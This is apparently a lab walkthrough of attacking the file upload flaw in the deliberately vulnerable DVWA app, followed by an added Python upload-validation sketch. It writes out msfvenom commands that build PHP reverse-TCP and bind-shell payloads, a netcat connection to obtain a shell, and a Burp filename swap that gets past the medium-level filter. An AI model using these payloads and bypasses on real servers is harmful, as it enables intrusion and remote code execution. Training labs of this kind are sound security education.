DVWA 1.9+: File Upload with Metasploit Venom
This article is about file upload as a security flaw. In previous articles we’ve set up our lab and made several exploitations against our target.
You can view those articles here.
File Upload — Low Security
Meterpreter
$ msfvenom -h
$ msfvenom -l payloads | grep php
View more info:
$ msfvenom -p php/meterpreter/reverse_tcp --list-options
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.231.107 LPORT=4444 -o php_venom.php
Remove ‘/*’ from the beginning of the file.
Upload
Prepare MSF
Execute and
Shell
$ msfvenom -p php/bind_php --list-options
$ msfvenom -p php/bind_php LHOST=192.168.231.107 LPORT=4444 -o php_bind.php
Remove ‘/*’ from the file.
Execute
$ nc 192.168.231.110 4444
Got a shell
File Upload — Medium Security
Change DVWA Security to medium and try again.
$ cp php_venom.php php_venom.php.jpg
Try to run:
Let’s hack our file upload. Start Burp Suite with Intercept on.
Return DVWA and upload file again. Go to Burp and change filename:
Then press Forward and go back to the browser to see a successful file upload. Go to hackable/upload and see php_venom.php updated. We’ve bypassed the medium security protection!
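Seen from the server side, the request that arrives is whatever the proxy forwarded, so an upload filter has to decide from the final filename and the bytes themselves, not from anything the client declares. The sketch below is an added example, not DVWA's code or part of the original article; the function name, allowlist, size limit and sample inputs are assumptions made for illustration.

```python
import os
import secrets

# Allowlist: extension -> magic bytes the content must start with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}
MAX_BYTES = 100_000  # constructed size limit for this example


def check_upload(filename, declared_type, data):
    """Return (accepted, reason, stored_name).

    declared_type is ignored on purpose: it is copied from the request,
    so whoever sends the request chooses it.
    """
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "name must be <stem>.<ext> with a single dot", None
    ext = "." + parts[1]
    if ext not in ALLOWED:
        return False, "extension not allowed", None
    if len(data) > MAX_BYTES:
        return False, "file too large", None
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    # Tripwire only; re-encoding the image server-side is the stronger step.
    if b"<?php" in data.lower():
        return False, "script tag inside image data", None
    # Never reuse the client's name on disk.
    return True, "ok", secrets.token_hex(16) + ext


# Constructed inputs: a harmless stub, not a real payload.
STUB = b"<?php /* placeholder */ ?>"
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
CASES = [
    ("php_venom.php", "image/jpeg", STUB),      # name as it reaches the server
    ("php_venom.php.jpg", "image/jpeg", STUB),  # the renamed copy
    ("photo.jpg", "image/jpeg", JPEG + STUB),   # real header, script appended
    ("photo.jpg", "image/jpeg", JPEG),          # plain image
]

if __name__ == "__main__":
    for name, ctype, body in CASES:
        print(name, check_upload(name, ctype, body)[:2])
```

Storing accepted files outside the web root, or in a directory where the server never executes scripts, keeps a missed case from turning into code execution.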
Conclusion
Again, with the help of tools we’ve hacked this target. In the next article we’ll keep at it using another vector of attack.